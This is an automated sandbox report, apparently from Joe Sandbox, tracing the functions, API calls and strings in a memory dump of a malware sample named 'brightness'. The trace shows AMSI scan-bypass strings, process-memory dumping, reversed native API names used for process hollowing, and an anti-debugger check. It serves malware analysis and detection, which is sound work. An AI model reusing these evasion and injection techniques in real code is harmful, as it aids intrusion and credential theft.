advapi32, xrefs: 0279A5BD
ScanBuffer, xrefs: 02798D84, 02798E0C, 027991A7, 027992BC, 02799359, 02799692, 02799819, 027999AC, 02799B91, 02799CA6, 02799E64, 02799FD4, 0279A147, 0279A33B, 0279A559, 0279A69F
NtReadVirtualMemory, xrefs: 0279A4D8
BCryptQueryProviderRegistration, xrefs: 0279A43F
MiniDumpWriteDump, xrefs: 0279A5CC
BCryptVerifySignature, xrefs: 0279A42B
NtSetSecurityObject, xrefs: 0279A747
BCryptRegisterProvider, xrefs: 0279A453
UacInitialize, xrefs: 02798EEA, 0279924B, 027993CA, 027994CE, 0279A1E8
dbgcore, xrefs: 0279A5D1, 0279A5E5
MiniDumpReadDumpStream, xrefs: 0279A5E0
I_QueryTagInformation, xrefs: 0279A5B8

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2852987580-51457883
Opcode ID: 5d9cc7f87e0dad254c549075feb6fe69d1995de9eb17df57a9af4c6b779c59a6
Instruction ID: 433c8bf9bf3384c597353aacfe6cddb16f727ed376515e225c9eb9ccbc58d172
Opcode Fuzzy Hash: 5d9cc7f87e0dad254c549075feb6fe69d1995de9eb17df57a9af4c6b779c59a6
Instruction Fuzzy Hash: BBE23175B4121A9BDF12FB65E8AAFCE73B6EF85300F1041E19005AB214DE71AE86CF51

Function 02785ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02780000,027AE790), ref: 02785AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02780000,027AE790), ref: 02785B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02780000,027AE790), ref: 02785B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02785B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02785BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02785B8B
RegQueryValueExA.ADVAPI32(?,02785D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02785BD1,?,80000001), ref: 02785BA9
RegCloseKey.ADVAPI32(?,02785BD8,00000000,?,?,00000000,02785BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02785BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02785BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02785BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02785BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02785C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02785C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02785C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02785CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02785CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02785CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02785CEB

Strings

Software\Borland\Locales, xrefs: 02785AFC, 02785B1A
Software\Borland\Delphi\Locales, xrefs: 02785B38

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: ffa31ac20dae0bf4217a39ea67b05b2f436e12c2e2aeb7af6012fb138455420f
Instruction ID: 025dcb815bb0d7ad1908929b7f64a6a7c012908143ae4b8d80f3e5e456417a38
Opcode Fuzzy Hash: ffa31ac20dae0bf4217a39ea67b05b2f436e12c2e2aeb7af6012fb138455420f
Instruction Fuzzy Hash: 78519A71B8025D7EFB21F6E4CC4AFEF7BAD9B04744F8101A1AB04E6181E7B49A458F61

Function 02798818 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize,027DB3A4,0279A7F4,UacScan), ref: 0279882C
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02798846
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,027DB3A4,0279A43F,ScanString,027DB3A4,0279A7F4,ScanBuffer,027DB3A4,0279A7F4,Initialize), ref: 02798882

Part of subcall function 02797D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02797DEC

Strings

BCryptVerifySignature, xrefs: 0279883F
bcrypt, xrefs: 0279882B

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: adf9e7d23cf7f829ae4ce04001711749a8a8a2172dd283f3f5d148298abee285
Instruction ID: 0d8377a754581bcc0005cf12c564dc948b7d2eaf783258224dfc519a24bf7d22
Opcode Fuzzy Hash: adf9e7d23cf7f829ae4ce04001711749a8a8a2172dd283f3f5d148298abee285
Instruction Fuzzy Hash: 02F0AFB1E823446FEF20A778B849F2637BDE74575CF02692EB108C7240C7704850EB21

Function 0279FA38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 0279FA48
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0279FA5A
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0279FA71

Strings

CheckRemoteDebuggerPresent, xrefs: 0279FA54
KernelBase, xrefs: 0279FA43

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 959cdeb9c799b4a771483ac51cb3af24965722ac2af4e18172e1a027db83ed26
Instruction ID: c131a31d48d852e7919127a5c49fd354b3f8f66399fd09d0e8ecfd731da8dce4
Opcode Fuzzy Hash: 959cdeb9c799b4a771483ac51cb3af24965722ac2af4e18172e1a027db83ed26
Instruction Fuzzy Hash: CDF0A770A04348BADF11A6F89888B9CFBA99B06328F2403D0D425E25E1E7711654C69A

Function 0279E064 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02784F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02784F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0279E134), ref: 0279E09F
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0279E134), ref: 0279E0CF
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0279E0E4
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0279E110
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0279E119

Part of subcall function 02784C60: SysFreeString.OLEAUT32(0279F798), ref: 02784C6E

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: e478947eb49b371ac853e11e87697f5489b614967db4668149f81a77a6516e9e
Instruction ID: 5b01169528a26f1928d09dc9fbb5416da78e5b270e2bfdc67139f704d727b568
Opcode Fuzzy Hash: e478947eb49b371ac853e11e87697f5489b614967db4668149f81a77a6516e9e
Instruction Fuzzy Hash: 5721C171A80309BAEB11EAE4DC56FDE77BDEB49700F500461B600F71C0EAB4AA448B65

Function 0279E7AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0279E8EA

Strings

OpenSession, xrefs: 0279E88C
ScanBuffer, xrefs: 0279E833
Initialize, xrefs: 0279E7DA

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 4f55ef51df616d45775e6133fd00b851641cc330dcec672851c29fb00437198d
Instruction ID: 6e86bd05aee19ef04fc343e9666073d52a34aabe2065faf180c1d5f09f96cb21
Opcode Fuzzy Hash: 4f55ef51df616d45775e6133fd00b851641cc330dcec672851c29fb00437198d
Instruction Fuzzy Hash: 21413075F5020A9FDF52FBA4E859EDEB7BAEF88710F504472E041A7240EAB1AD018F51

Function 0279DF80 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 02784F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02784F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0279E052), ref: 0279DFBF
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0279DFF9
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0279E026
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0279E02F

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 30e2e6d2e82834913c8f5ddcad7b45e0850936b94a6cd878f9265378b0dc9165
Instruction ID: 7acd0100fff32fb96bcff9098301261a03ed111dddb3d45e7f40a217371ddd7a
Opcode Fuzzy Hash: 30e2e6d2e82834913c8f5ddcad7b45e0850936b94a6cd878f9265378b0dc9165
Instruction Fuzzy Hash: FE21F171A80309BAEF21EBA4DD56F9E77BDEB05B00F614061B600F71C0DBB46E048B65

Function 02798654 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027986E0

Strings

Kernel32, xrefs: 0279869F
CreateProcessAsUserW, xrefs: 0279866D

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: ed6e0b1f07c74e7e3b7446e3e09d74270a8fec6740a1ca21c6bc10b85e294c61
Instruction ID: 216feb7591365dacf603b8c459a7297beca2d55eab1f318b1f62d8932adaabe2
Opcode Fuzzy Hash: ed6e0b1f07c74e7e3b7446e3e09d74270a8fec6740a1ca21c6bc10b85e294c61
Instruction Fuzzy Hash: 6111E5B2640209BFDB41EFACEC55F9A37EDEB0D700F524464BA08D7640D674E9109B65

Function 02797A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02797A9F

Strings

ntdll, xrefs: 02797A74
yromeMlautriVetacollAwZ, xrefs: 02797A47

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: 00cd681f41e4db638af5271fae3b20cdbc505d165890662e6ff500428eece603
Instruction ID: 206747885cb052623c24a1cbcb51020957ee47e9812321124b6ecb931d877274
Opcode Fuzzy Hash: 00cd681f41e4db638af5271fae3b20cdbc505d165890662e6ff500428eece603
Instruction Fuzzy Hash: FD1184B5650309BFEB05EFA8EC55EAEB7FDEB48700F414460B900D7600EA70AA008F65

Function 02797A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02797A9F

Strings

ntdll, xrefs: 02797A74
yromeMlautriVetacollAwZ, xrefs: 02797A47

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$AllocateMemoryVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 4072585319-445027087
Opcode ID: e17294af979835c00b80eacc4e4d41ff36c542f69601ffb93678b9f5877bed8d
Instruction ID: ab753a9aadda1550beeb5ac1515ba8b7f88eae371d2b7234a768affa2a8889cf
Opcode Fuzzy Hash: e17294af979835c00b80eacc4e4d41ff36c542f69601ffb93678b9f5877bed8d
Instruction Fuzzy Hash: 531192B5650309BFEB05EFA8EC55F9EB7FDEB48B00F418460B900D7600EA70AA008F65

Function 027982CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0279833D

Strings

ntdll, xrefs: 02798314
yromeMlautriVdaeRtN, xrefs: 027982E7

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 3978ec5825524f71da1627ce360a88da3f6d4269d8ad896fcdbf06b4d81e51d4
Instruction ID: 710f62a82ecb341140db0bec8d9f404b58a56a824bec264eb3eace8b4bf8a2be
Opcode Fuzzy Hash: 3978ec5825524f71da1627ce360a88da3f6d4269d8ad896fcdbf06b4d81e51d4
Instruction Fuzzy Hash: B9011275640309AFDB01EFA8EC55E9E7BFDEB49704F528460B504D7600DA70E9109F65

Function 02797D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02797DEC

Strings

yromeMlautriVetirW, xrefs: 02797D93
Ntdll, xrefs: 02797DC3

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250373550.00000000027DB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2250485307.00000000028D2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2780000_brightness.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: b19fb2fb303aa45907a5c4051783885a7409c262387f141bdeaa2abe6d2e0ef8
Instruction ID: b213fad9b0cc999fa70b6fce42cc2fde33b4ee20ceac27918c2c23c60b2533f6
Opcode Fuzzy Hash: b19fb2fb303aa45907a5c4051783885a7409c262387f141bdeaa2abe6d2e0ef8
Instruction Fuzzy Hash: CB015EB5650309AFDB05EFA8EC56E9FB7FDEB49700F518860B504D7600DA70AD108F65

Function 0279853C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02798098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02798108,?,?,00000000,?,02797A7E,ntdll,00000000,00000000,02797AC3,?,?,00000000), ref: 027980D6
Part of subcall function 02798098: GetModuleHandleA.KERNELBASE(?), ref: 027980EA

Part of subcall function 02798140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027981C8,?,?,00000000,00000000,?,027980E1,00000000,KernelBASE,00000000,00000000,02798108), ref: 0279818D
Part of subcall function 02798140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02798193
Part of subcall function 02798140: GetProcAddress.KERNEL32(?,?), ref: 027981A5

NtUnmapViewOfSection.NTDLL(?,?), ref: 027985A1

Strings

ntdll, xrefs: 02798584
noitceSfOweiVpamnUtN, xrefs: 02798557

Memory Dump Source

Source File: 00000007.00000002.2249074890.0000000002781000.00000020.00001000.00020000.00000000.sdmp, Offset: 02780000, based on PE: true

Associated: 00000007.00000002.2248230428.0000000002780000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2249842425.00000000027AE000.00000004.00001000.00020000.00000000.sdmpDownload File
